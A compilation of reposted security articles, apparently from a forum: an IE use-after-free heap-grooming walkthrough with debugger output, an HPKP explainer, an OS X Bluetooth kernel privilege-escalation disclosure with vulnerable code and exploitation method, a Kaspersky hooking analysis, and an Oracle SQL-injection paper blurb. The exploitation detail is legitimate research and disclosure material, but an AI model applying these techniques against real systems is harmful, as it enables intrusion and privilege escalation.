to see how to bypass isolated heap. 1. First, we create 4 CTitleElement to prevent heap coalescing with previous heap. Then, we create another 4 CTitleElement and make a hole. 030e4500 0009 0009 [00] 030e4508 00040 - (busy) // junk[3] MSHTML!CTitleElement::`vftable' 030e4548 0009 0009 [00] 030e4550 00040 - (busy) // title[0] MSHTML!CTitleElement::`vftable' 030e4590 0009 0009 [00] 030e4598 00040 - (busy) // title[1] MSHTML!CTitleElement::`vftable' 030e45d8 0009 0009 [00] 030e45e0 00040 - (free) // hole 030e4620 0009 0009 [00] 030e4628 00040 - (busy) // title[3] MSHTML!CTitleElement::`vftable' 2. We fill the hole with the use-after-free CTitleElement. We need to control 0x030e45e0 + 0x38. 030e4500 0009 0009 [00] 030e4508 00040 - (busy) // junk[3] MSHTML!CTitleElement::`vftable' 030e4548 0009 0009 [00] 030e4550 00040 - (busy) // title[0] MSHTML!CTitleElement::`vftable' 030e4590 0009 0009 [00] 030e4598 00040 - (busy) // title[1] MSHTML!CTitleElement::`vftable' 030e45d8 0009 0009 [00] 030e45e0 00040 - (busy) // the use-after-free CTitleElement MSHTML!CTitleElement::`vftable' 030e4620 0009 0009 [00] 030e4628 00040 - (busy) // title[3] MSHTML!CTitleElement::`vftable' 3. We trigger freeing of the use-after-free CTitleElement and free other CTitleElement of the title array to trigger heap coalescing. 030e4500 0009 0009 [00] 030e4508 00040 - (busy) // junk[3] MSHTML!CTitleElement::`vftable' 030e4548 0024 0009 [00] 030e4550 00118 - (free) // coalesced heap 4. We fill the coalesced heap with CAreaElement to control 0x030e45e0 + 0x38. 030e4500 0009 0009 [00] 030e4508 00040 - (busy) MSHTML!CTitleElement::`vftable' 030e4548 000e 0009 [00] 030e4550 00064 - (busy) MSHTML!CAreaElement::`vftable' 030e45b8 000e 000e [00] 030e45c0 00064 - (busy) MSHTML!CAreaElement::`vftable' 0:006> dd 0x030e45e0 + 0x38 030e4618 41414141 00000000 00000001 00000000 030e4628 64548e48 0000d8fa 030e4cf0 030e58a0 030e4638 00000000 00000000 00000000 00000000 030e4648 00000000 00000000 00000000 00000000 030e4658 00000000 00000000 00000000 00000000 030e4668 61558e4c 0800d8fc 00000000 00000000 030e4678 00000000 00000000 00000000 00000000 030e4688 00000000 00000000 00000000 00000000 As we can see, we've bypassed isolated heap. (818.a74): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=41414141 ebx=030e5300 ecx=00ae7f88 edx=41414179 esi=030e7400 edi=02fdabd8 eip=72cd3419 esp=02fdaba4 ebp=02fdabbc iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 MSHTML!CTitleElement::Notify+0xcd: 72cd3419 8b02 mov eax,dword ptr [edx] ds:002b:41414179=???????? Sursa: KeenTeam - Blog

HTTP Public-Key-Pinning explained In my last post “Deploying TLS the hard way” I explained how TLS and its extensions (as well as a few HTTP extensions) work and what to watch out for when enabling TLS for your server. One of the HTTP extensions mentioned is HTTP Public-Key-Pinning (HPKP). As a short reminder, the header looks like this: Public-Key-Pins: pin-sha256="GRAH5Ex+kB4cCQi5gMU82urf+6kEgbVtzfCSkw55AGk="; pin-sha256="lERGk61FITjzyKHcJ89xpc6aDwtRkOPAU0jdnUqzW2s="; max-age=15768000; includeSubDomains You can see that it specifies two pin-sha256 values, that is the pins of two public keys. One is the public key of your currently valid certificate and the other is a backup key in case you have to revoke your certificate. I received a few questions as to why I suggest including a backup pin and what the requirements for a backup key would be. I will try to answer those with a more detailed overview of how public key pinning and TLS certificates work. How are RSA keys represented? Let us go back to the beginning and start by taking a closer look at RSA keys: $ openssl genrsa 4096 The above command generates a 4096 bit RSA key and prints it to the console. Although it says -----BEGIN RSA PRIVATE KEY----- it does not only return the private key but an ASN.1 structure that also contains the public key - we thus actually generated an RSA key pair. A common misconception when learning about keys and certificates is that the RSA key itself for a given certificate expires. RSA keys however never expire - after all they are just three numbers. Only the certificate containing the public key can expire and only the certificate can be revoked. Keys “expire” or are “revoked” as soon as there are no more valid certificates using the public key, and you threw away the keys and stopped using them altogether. What does the TLS certificate contain? By submitting the Certificate Signing Request (CSR) containing your public key to a Certificate Authority it will issue a valid certificate. That will again contain the public key of the RSA key pair we generated above and an expiration date. Both the public key and the expiration date will be signed by the CA so that modifications of any of the two would render the certificate invalid immediately. For simplicity I left out a few other fields that X.509 certificates contain to properly authenticate TLS connections, for example your server’s hostname and other details. How does public key pinning work? The whole purpose of public key pinning is to detect when the public key of a certificate for a specific host has changed. That may happen when an attacker compromises a CA such that they are able to issue valid certificates for any domain. A foreign CA might also just be the attacker, think of state-owned CAs that you do not want to be able to {M,W}ITM your site. Any attacker intercepting a connection from a visitor to your server with a forged certificate can only be prevented by detecting that the public key has changed. After the server sent a TLS certificate with the handshake, the browser will look up any stored pins for the given hostname and check whether any of those stored pins match any of the SPKI fingerprints (the output of applying SHA-256 to the public key information) in the certificate chain. The connection must be terminated immediately if pin validation fails. If the browser does not find any stored pins for the current hostname then it will directly continue with the usual certificate checks. This might happen if the site does not support public key pinning and does not send any HPKP headers at all, or if this is the first time visiting and the server has not seen the HPKP header yet in a previous visit. Pin validation should happen as soon as possible and thus before any basic certificate checks are performed. An expired or revoked certificate will be happily accepted at the pin validation stage early in the handshake when any of the SPKI fingerprints of its chain match a stored pin. Only a little later the browser will see that the certificate already expired or was revoked and will reject it. Pin validation also works for self-signed certificates, but they will of course raise the same warnings as usual as soon as the browser determined they were not signed by a trusted third-party. What if your certificate was revoked? If your server was compromised and an attacker obtained your private key you have to revoke your certificate as the attacker can obviously fully intercept any TLS connection to your server and record every conversation. If your HPKP header contained only a single pin-sha256 token you are out of luck until the max-age directive given in the header lets those pins expire in your visitors’ browsers. Pin validation requires checking the SPKI fingerprints of all certificates in the chain. When for example StartSSL signed your certificate you have another intermediate Class 1 or 2 certificate and their root certificate in the chain. The browser trusts only the root certificate but the intermediate ones are signed by the root certificate. The intermediate certificate in turn signs the certificate deployed on your server and that is called a chain of trust. To prevent getting stuck after your only pinned key was compromised, you could for example provide the SPKI fingerprint of StartSSL’s Class 1 intermediate certificate. An attacker would now have to somehow get a certificate issued by StartSSL’s Class 1 tier to successfully impersonate you. You are however again out of luck should you decide to upgrade to Class 2 in a month because you decided to start paying for a certificate. Pinning StartSSL’s root certificate would let you switch Classes any time and the attacker would still have to get a certificate issued by StartSSL for your domain. This is a valid approach as long as you are trusting your CA (really?) and as long as the CA itself is not compromised. In case of a compromise however the attacker would be able to get a valid certificate for your domain that passes pin validation. After the attack was discovered StartSSL would quickly revoke all currently issued certificates, generate a new key pair for their root certificate and issue new certificates. And again we would be out of luck because suddenly pin validation fails and no browser will connect to our site. Include the pin of a backup key The safest way to pin your certificate’s public key and be prepared to revoke your certificate when necessary is to include the pin of a second public key: your backup key. This backup RSA key should in no way be related to your first key, just generate a new one. A good advice is to keep this backup key pair (especially the private key) in a safe place until you need it. Uploading it to the server is dangerous: when your server is compromised you lose both keys at once and have no backup key left. Generate a pin for the backup key exactly as you did for the current key and include both pin-sha256 values as shown above in the HPKP header. In case the current key is compromised make sure all vulnerabilities are patched and then remove the revoked pin. Generate a CSR for the backup key, let your CA issue a new certificate, and revoke the old one. Upload the new certificate to your server and you are done. Finally, do not forget to generate a new backup key and include that pin in your HPKP header again. Once a browser successfully establishes a TLS connection the next time, it will see your updated HPKP header and replace any stored pins with the new ones. Sursa: https://timtaubert.de/blog/2014/10/http-public-key-pinning-explained/

[h=3]Mac OS X local privilege escalation (IOBluetoothFamily)[/h] (This post is a joint work with @joystick, see also his blog here) Nowadays, exploitation of user-level vulnerabilities is becoming more and more difficult, because of the widespread diffusion of several protection methods, including ASLR, NX, various heap protections, stack canaries, and sandboxed execution. As a natural consequence, instead of extricating themselves with such a plethora of defensive methods, attackers prefer to take the “easy” way and started to move at the kernel-level, where sophisticated protection techniques are still not very common (indeed, things like as KASLR and SMEP are implemented only in the latest versions of the most popular OSes). This trend is also confirmed by the rising number of kernel-level vulnerabilities reported in the last few months in Windows, Linux, and OS X. Following this trend, we recently looked at few OS X drivers (“KEXT”s) and found a integer signedness bug affecting service IOBluetoothHCIController (implemented by the IOBluetoothFamily KEXT). This vulnerability can be exploited by a local attacker to gain root privileges. The issue is present on the latest versions of OS X Mavericks (tested on 10.9.4 and 10.9.5), but has been “silently” patched by Apple in OS X Yosemite. [h=3]Vulnerability overview[/h] In a nutshell, the bug lies in the IOBluetoothHCIUserClient::SimpleDispatchWL() function. The function eventually takes a user-supplied 32-bit signed integer value and uses it to index a global array of structures containing a function pointer. The chosen function pointer is finally called. As the reader can easily imagine, SimpleDispatchWL() fails at properly sanitizing the user-supplied index, thus bad things may happen if a malicious user is able to control the chosen function pointer. More in detail, the vulnerable part of the function is summarized in the pseudocode below. At line 14, the user-supplied 32-bit integer is casted to a 64-bit value. Then, the "if" statement at line 16 returns an error if the casted (signed) value is greater than the number of methods available in the global _sRoutines array; obviously, due to the signed comparison, any negative value for the method_index variable will pass this test. At line 20 method_index is used to access the _sRoutines array, and the retrieved callback is finally called at line 23. [TABLE] [TR] [TD] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 [/TD] [TD]typedef struct { void (*function_pointer)(); uint64 num_arguments; } BluetoothMethod; BluetoothMethod _sRoutines[] = { ... }; uint64 _sRoutineCount = sizeof(_sRoutines)/sizeof(BluetoothMethod); IOReturn IOBluetoothHCIUserClient::SimpleDispatchWL(IOBluetoothHCIDispatchParams *params) { // Here "user_param" is a signed 32-bit integer parameter int64 method_index = (int64) user_param; if (method_index >= _sRoutineCount) { return kIOReturnUnsupported; } BluetoothMethod method = _sRoutines[method_index]; ... if (method.num_arguments < 8) { method.function_pointer(...); } ... } [/TD] [/TR] [/TABLE] [h=3]Exploitation details[/h] Exploitation of this vulnerability is just a matter of supplying the proper negative integer value in order to make IOBluetoothFamily index the global _sRoutines structure out of its bounds, and to fetch an attacker-controlled structure. The supplied value must be negative to index outside the _sRoutines structure while still satisfying the check at line 16. As a foreword, consider that for our "proof-of-concept" we disabled both SMEP/SMAP and KASLR, so some additional voodoo tricks are required to get a fully weaponized exploit. Thus, our approach was actually very simple: we computed a value for the user-supplied parameter that allowed us to index a BluetoothMethod structure such that BluetoothMethod.function_ptr is a valid user-space address (where we placed our shellcode), while BluetoothMethod.num_arguments is an integer value less than 8 (to satisfy the check performed by SimpleDispatchWL() at line 22). As shown in the C code fragment above, the user-supplied 32-bit value (user_param) is first casted to a 64-bit signed value, and then used as an index in _sRoutines. Each entry of the global _sRoutines array is 16-byte wide (two 8-byte values). These operations are implemented by the following assembly code: [TABLE] [TR] [TD] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [/TD] [TD]; r12+70h points to the user-supplied index value mov ecx, [r12+70h] mov r13d, kIOReturnUnsupported lea rdx, _sRoutineCount cmp ecx, [rdx] jge fail ; Go on and fetch _sRoutine[method_index] ... movsxd rax, ecx ; Sign extension to 64-bit value shl rax, 4 ; method_index *= sizeof(BluetoothMethod) lea rdx, _sRoutines mov esi, [rdx+rax+8] ; esi = _sRoutines[method_index].num_arguments cmp esi, 7 ; Check method.num_arguments < 8 ja loc_289BA ... [/TD] [/TR] [/TABLE] At a higher-level, the address of the BluetoothMethod structure fetched when processing an index value "user_param" is computed by the following formula: struct_addr = (ext(user_param & 0xffffffff) * 16) + _sRoutine Where ext() is the sign-extension operation (implemented by the movsxd instruction in the assembly code snipped above). By solving this formula for user_param and searching inside the kernel address space, we found several candidate addresses that matched our criteria (i.e., a valid user-space pointer followed by an integer value < 8). The rest of the exploit is just a matter of mmap()'ing the shellcode at the proper user-space address, connecting to the IOBluetoothHCIController service and invoking the vulnerable method. The source code for a (very rough) proof-of-concept implementation of the aforementioned exploit is available here, while the following figure shows the exploit "in action". [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Execution of our "proof-of-concept" exploit[/TD] [/TR] [/TABLE] [h=3]Patching[/h] We verified the security issue both on OS X Mavericks 10.9.4 and 10.9.5 (MD5 hash values for the IOBluetoothFamily KEXT bundle on these two OS versions are 2a55b7dac51e3b546455113505b25e75 and b7411f9d80bfeab47f3eaff3c36e128f, respectively). After the release of OS X Yosemite (10.10), we noticed the vulnerability has been silently patched by Apple, with no mention about it in the security change log. A side-by-side comparison between versions 10.9.x and 10.10 of IOBluetoothFamily confirms Apple has patched the device driver by rejecting negative values for the user-supplied index. In the figure below, the user-supplied index value is compared against _sRoutineCount (orange basic block). Yosemite adds an additional check to ensure the (signed) index value is non-negative (green basic block, on the right). [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Comparison of the vulnerable OS X driver (Mavericks, on the left) and patched version (Yosemite, on the right)[/TD] [/TR] [/TABLE] [h=3]Conclusions[/h] We contacted Apple on October 20th, 2014, asking for their intention to back-port the security fix to OS X Mavericks. Unfortunately, we got no reply, so we decided to publicly disclose the details of this vulnerability: Yosemite has now been released since a while and is available for free for Apple customers; thus, we don’t think the public disclosure of this bug could endanger end-users. Sursa: Roberto Paleari's blog: Mac OS X local privilege escalation (IOBluetoothFamily)

Kaspersky Hooking Engine Analysis October 27, 2014 By Andrea Sindoni Leave a Comment In this article we will talk about a few hooking techniques used by antivirus software. For the purpose of this analysis the antivirus chosen will be Kaspersky (Antivirus in prova: scarica le versioni trial | Kaspersky Lab IT PURE 3.0 Total Security), we will deal with various hooking techniques used both at user and kernel mode. The reference operating system will be Windows 7 Professional 32-bit. The image below shows a summary of the techniques we will analyze in this article. In order we will deal with: User-space Processes Inline hooking IAT and EAT Virtual Address Descriptor Hidden registry entry IDT SSDT MINI-FILTER IRP TDI HOOKING CALLBACKS Conclusion User-space Processes We start with a brief introduction by looking at the processes of kaspersky in user-space. The main userspace process is “avp.exe” which is instantiated twice: one instance runs under the privileges of NT AUTHORITY\SYSTEM the other is used for the user interface (avp.exe user). The other process: ProtectedObjectsSrv.exe acts as encryption service. We will focus on the last one: it runs as a background Windows service called “CSObjectsSrv” (CryptoStorage control service). InfoWatch CryptoStorage is intended for centralized protection of confidential data using cryptographic methods during data storage and processing. The product is based on the integrative approach to data protection. The functional capabilities include file and folder encryption using resilient encryption algorithms, an option to create special data storage objects – the container files, logical disks and flash drives and differentiation of access rights to the protected objects. InfoWatch CryptoStorage protects against unauthorised access to the RAM content dumped to the hard disk in case of hibernation, crash dumps or data coming from temporary files and swap files. More information about this topic can be found at InfoWatch - information security software products and solutions Let’s now look at all the hooking methods starting from the userland. Inline hooking To find API hooks in User-mode, we can use use the apihooks plugin of Volatility The processes involved in the inline hooking are: svchost.exe avp.exe[pid1] NT Authority\SYSTEM avp.exe[pid2] avp.exe one is for the protection service (avp.exe system), the other one, as already said, is for the user interface (avp.exe user). The service requires full system access, that’s why it runs as System. Let’s examine svchost.exe, this process is subject to inline hooking, in fact, at address 0x7453b5dd we can find a jump that leads to wfapigp.dll, which resides at location 0x74586218. Using Volatility we can dump the process with pid 1560 and using IDA we can quickly disassemble the dump and double check for the presence of the hook at location 0x7453b5dd. Scrolling again the report generated by Volatility, we can see that the process avp.exe uses different modules (image below) The process avp.exe makes use of different hooking techniques??, let’s try and investigate the following module: ushata.dll In this case the hooking occurs inside ntdll.dll, the function hooked is ZwProtectVirtualMemory, which is located at 0x77015f18, checking with IDA we can confirm the presence of a jump at 0x71722066, which is the location in which the hooking module ushata.dll is loaded. In here we can see how avp.exe loads ushdata.dll using a standard LoadLibraryEx() In this context, can occur something similar to what is described in the following code, basically: [TABLE] [TR] [TD=class: code]hDLL = LoadLibraryExW(L"USHATA.DLL", null, 8); lpGetNumber = (LPGETNUMBER)GetProcAddress((HMODULE)hDLL, "InitHooks"); [/TD] [/TR] [/TABLE] Let’s see what are the methods exported by the module ushdata.dll: So the exported functions of ushdata.dll module are InitHooks, SetClientVerdict and SetShuttingDownHint. In general from the report generated by volatility, the modules and functions that are subject to inline hooking, are: C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe[pid1] and [pid2] C:\Windows\SYSTEM32\ntdll.dll (FUNCTIONS ntdll.dll!NtProtectVirtualMemory e ntdll.dll!ZwProtectVirtualMemory) C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe[pid1] and [pid2] ntdll.dll!NtProtectVirtualMemory JMP 70B12066 C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\ushata.dll C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe[pid1] and [pid2] C:\Windows\system32\kernel32.dll C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe[pid1] and [pid2] C:\Windows\system32\ole32.dll C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe[pid1] and [pid2] USER32.dll!NotifyWinEvent + 6AE The undocumented used is NtProtectVirtualMemory, which will allows to set the page protection and returns the old protection (http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/Memory%20Management/Virtual%20Memory/NtProtectVirtualMemory.html). IAT and EAT Continuing the analysis of the hooking in User-space, we can still make use of Volatility to detect the hooking performed on both the IAT and EAT. We will find only two functions: one for the IAT hooking and another one for EAT hooking. Referring to the image at the top (EAT Hook), we conclude that the affected module is kernel32.dll, specifically the CreateThread function, as shown in the figure below: Virtual Address Descriptor We can open a brief parenthesis on the kernel data structure that takes care of registering the use of virtual addresses in a process, it is called Process VAD (Virtual Address Descriptor). For each process the memory manager maintains a set of VADs, which contain information on the address space of the process itself. Reconstructing the VAD tree allows for the reconstruction of the process with all of its mapped files. Here’s an example: The protection field highlighted in red is extracted from the flProtect parameter passed as input to the VirtualAlloc API (VirtualAlloc function (Windows)). You can also use the windbg command !vad to display the VADs of a given process: [TABLE] [TR] [TD=class: code]kd> !process 0 1 avp.exe kd> !vad [address of VadRoot] [/TD] [/TR] [/TABLE] Hidden registry entry A hive is a database of registry values ??divided in logical groups of keys and subkeys; the values ??in the registry, in turn, have a number of supporting files containing backups of their data. These files are located mainly in the %SystemRoot% \System32\Config and are created/updated each time the user logs in. Here is a table showing the standard hive with the respective files (Registry Hives (Windows)): [TABLE] [TR] [TD]Registry hive[/TD] [TD]Supporting files[/TD] [/TR] [TR] [TD]HKEY_CURRENT_CONFIG[/TD] [TD]System, System.alt, System.log, System.sav[/TD] [/TR] [TR] [TD]HKEY_CURRENT_USER[/TD] [TD]Ntuser.dat, Ntuser.dat.log[/TD] [/TR] [TR] [TD]HKEY_LOCAL_MACHINE\SAM[/TD] [TD]Sam, Sam.log, Sam.sav[/TD] [/TR] [TR] [TD]HKEY_LOCAL_MACHINE\Security[/TD] [TD]Security, Security.log, Security.sav[/TD] [/TR] [TR] [TD]HKEY_LOCAL_MACHINE\Software[/TD] [TD]Software, Software.log, Software.sav[/TD] [/TR] [TR] [TD]HKEY_LOCAL_MACHINE\System[/TD] [TD]System, System.alt, System.log, System.sav[/TD] [/TR] [TR] [TD]HKEY_USERS\.DEFAULT[/TD] [TD]Default, Default.log, Default.sav[/TD] [/TR] [/TABLE] Let’s look for hidden registry values related to the driver klif.sys and let’s start with the help command !reg: !reg hivelist It displays a list of all hives in the system, then we select the Hive Address of SYSTEM using the following command: !reg openkeys “Hive Address of SYSTEM” It displays all open keys in a hive: I also used the above the command: !reg cellIndex “HiveAddress of SYSTEM” “Index” It displays the virtual address for a cell in a hive, Index specifies the cell index. Using the command: !reg valuelist “HiveAddress of SYSTEM” KeyNodeAddress we can show a list of the values in the specified key node, KeyNodeAddress specifies the address of the key node. Then we show the registry key value structure !reg kvalue Address Address specifies the address of the value, finally, we can reuse the cell index with the new index of the cell and dc command (it displays double word values, 4 bytes, and ASCII characters) We can achieve the same result using Volatility, let’s briefly show how to do that using the command hivelist: And once again we come across the KLIF service: Let’s now move to the analysis of the hooking at kernel space, in particular we will deal with: IDT, SSDT and IRP hooking. IDT System calls are used to traverse the barrier that exists between user space and kernel space, for this task the IDT is used, the IDT is the table that implements the interrupt vector table, in turn used to dispatch the interrupts. The IDT is composed, internally, of a data structure of 8 bytes entries, which describes how the interrupt must be managed (x86 CPU). In the picture below you can see the relationship between IDT and the instruction “int 2e” that is normally used to initiate a system call, even though on recent CPUs the SYSENTER instruction is used a replacement. The goal of IDT hooking is to hook any function already registered for a given interrupt. Let’s see if the software in question uses these techniques, so we can analyze it with windbg and the command !idt Now let’s run the same check with volatility,using the command idt, we will see that the two results match: In the selected row we can see, from the column Value, that the address matches the one analyzed with windbg, also in the column Module we can notice the presence of ntoskrnl.exe, which shows that there are no hooks in place. SSDT The System Service Descriptor Table (SSDT) contains pointers to kernel mode functions provided by the kernel executable module (ntoskrnl.exe). There is a second SSDT called shadow SSDT table, that instead stores the native functions provided by the GUI module win32k.sys. It ‘important to make an observation: when a system call reaches ntdll.dll, EAX will contain the hexadecimal value corresponding to the index into the SSDT of the function to be called, and immediately after the command int 2E the control is transferred to KiSystemService: We’re going to check the contents of the two tables for the software in question, it is possible to analyze the memory with Volatility or WinDBG: From the figure on the left hand side we can see the memory belonging to klif.sys at address 0x8C836000. On the right hand side we have the output of the command: kd> dps KiServiceTable l11C that show the presence of SSDT hooks from the klif module. We can also investigate KeServiceDescriptorTable and KeServiceDescriptorTableShadow. The module klif.sys seems to be the one that deals with SSDT and SSDT Shadow hooking. Let’s look more closely at klif.sys, the first function we’re going to inspect is “PsSetLoadImageNotifyRoutine” that registers a driver-supplied callback that is subsequently notified whenever an image is loaded (or mapped into memory). In the image below we see a series of two calls, the first one calls ZwQuerySystemInformation and then the second one invokes KeServiceDescriptorTable, which is the classical sequence used to install an SSDT hook. SSDT hooking is not performed on 64-bits systems because the Kernel Patch Protection (KPP), also known as Patchguard, protects this structure. It is anyway possible to use a mini-filter driver as a workaround. MINI-FILTER And indeed that’s what we have, a minifilter driver: A mini-filter driver must specify an altitude value from an altitude range that represents a load order group. A minifilter driver’s altitude ensures that the instance of the minifilter driver is always loaded at the appropriate location related to other minifilter driver instances, and it determines the order in which the filter manager calls the minifilter driver to handle I/O. Altitudes are allocated and managed by Microsoft itself. The following figure shows a simplified I/O stack with the filter manager and three minifilter drivers. I n our case we have [TABLE] [TR] [TD]Load order group[/TD] [TD]Altitude range[/TD] [TD]Description[/TD] [/TR] [TR] [TD]FSFilter Anti-Virus[/TD] [TD]320000-329999[/TD] [TD]This group includes filter drivers that detect and disinfect viruses during file I/O.[/TD] [/TR] [/TABLE] More information at http://msdn.microsoft.com/en-us/library/windows/hardware/ff549689%28v=vs.85%29.aspx IRP An IRP is an object used to communicate between all the different layers of a driver stack (Driver stacks (Windows Drivers)). For each driver, there are some major functions that receive IRPs to process. These major functions are kept inside a table of pointers. This driver contains the following functions: Driver Entry AddDevice Dispatch routine Unload() The Driver Object structure is presented as follows By default the I/O manager does point the DriverInit at the DriverEntry(). The array MajorFunction is essentially a table, each driver populates this table with function pointers, called Dispatch routine. The main data structures used by the kernel driver majors are the IRPs. Some of the most used are: IRP_MJ_CREATE, IRP_MJ_READ, IRP_MJ_WRITE, IRP_MJ_DEVICE_CONTROL. We can sniff the traffic IRP to the driver klif using Irp Tracker: From the red boxes we can see the two processes: avp.exe and svchost.exe calling the NtFsControlFile API (which sends a control code directly to the driver klif) TDI HOOKING The kernel module responsible for TDI HOOKING is kltdi.sys, we can look for it inside the structure LDR_DATA_TABLE_ENTRY, pointed by PsLoadedModuleList. By running the modules command in Volatility we will get: kltdi.sys 0x8cb7a000 0x9000 \SystemRoot\system32\DRIVERS\kltdi.sys At this point we can check to see if there is something unusual for the driver “tdx“: As we can see this is a list of devices that belongs to \Driver\tdx and in each device the module kltdi.sys is present, loaded at the address 0x8cb57000. Using Windbg we can check what happens at the location where tdx.sys is loaded: tdx.sys 0x8cb57000 0x17000 \SystemRoot\system32\DRIVERS\tdx.sys We only see the location of the major Function IRP_MJ_CREATE: DriverName: tdx DriverStart: 0x8cb57000 DriverSize: 0x17000 DriverStartIo: 0x0 0 IRP_MJ_CREATE 0x8cb62faa tdx.sys Let’s set a breakpoint at the address 0x8cb62faa, this is the location where the major function IRP_MJ_CREATE of the module tdx.sys. After then we can start a ping and the debugger will immediately break at the address we are expecting, thus confirming the existence of a TDI hook. We can see in the call stack the presence of the module kltdi.sys, let’s focus on the function kltdi+0x4803: The IoCallDriver routine sends an IRP to the driver associated with a specified device object, it accepts two input parameters DEVICE_OBJECT*an IRP* [TABLE] [TR] [TD=class: gutter]1 2 3 4[/TD] [TD=class: code]NTSTATUS IoCallDriver( _In_ PDEVICE_OBJECT DeviceObject, _Inout_ PIRP Irp ); [/TD] [/TR] [/TABLE] Quoting the Microsoft’s documentation: An IRP passed in a call to IoCallDriver becomes inaccessible to the higher-level driver, unless the higher-level driver has called IoSetCompletionRoutine to set up an IoCompletion routine for the IRP. If it has, the IRP input to the IoCompletion routine has its I/O status block set by the lower drivers, and all lower-level drivers’ I/O stack locations are filled with zeros. CALLBACKS Now let’s take a look at the kernel callbacks, once again with Volatility: Thread creation (PsSetCreateThreadNotifyRoutine): klif.sys kl1.sys Shutdown callbacks (IoRegisterShutdownNotification): kl1.sys KeRegisterBugCheckReasonCallback kl1.sys There are several addresses for the callbacks, but we want to point out the presence of kernel module kl1.sys, so let’s dig deeper: kl1.sys is is a boot start driver, in the image below you can see the presence (in the DriverEntry routine) of the API IoRegisterBootDriverReinitialization. IoRegisterBootDriverReinitialization() function registers a callback routine that will be called whenever all boot drivers have been loaded. This routine is typically used in filters that attach on non-Plug-and-Play devices, and thus, they cannot rely on AddDevice() function calling to be notified that a new device was created (check this example for more details Let’s Start Again « DriverEntry.com.br). Now let’s also look at the Driver Dispatch Routines: As you can see, all Driver Dispatch Routines point to the same address, kl1+0x32f0 Conclusion The article was written for educational purposes, the analysis is not detailed and many things have been analysed very quickly, also there is still research to be done on the network part. A big thanks goes to Quequero. Reference http://www.reconstructer.org/papers/Hunting%20rootkits%20with%20Windbg.pdf Malware Analysts Cookbook and DVD: Tools and Techniques for Fighting Malicious Code Sursa: https://quequero.org/2014/10/kaspersky-hooking-engine-analysis/

Cei care veniti sa nu uitati tricourile cu "Fan Nytro"!

Hacking Oracle from the Web This paper discusses the exploitation techniques available for exploiting SQL Injection from web applications against the Oracle database. Most of the techniques available over the Internet are based on exploitation when attacker has interactive access to the Oracle database, i.e. he can connect to the database via a SQL client. While some of these techniques can be directly applied when exploiting SQL injection in web applications, this is not always true. Unlike MS-*?SQL, Oracle neither supports nested queries, nor has any direct functionality like xp_cmdshell to allow execution of operating system commands. Extraction of sensitive data from a back-*?end database by exploiting SQL injection in Oracle web applications is well known. Performing privilege escalation and executing operating system commands from web applications is not widely known, and is the subject of this paper. Download: http://7safe.com/assets/pdfs/Hacking_Oracle_From_Web_2.pdf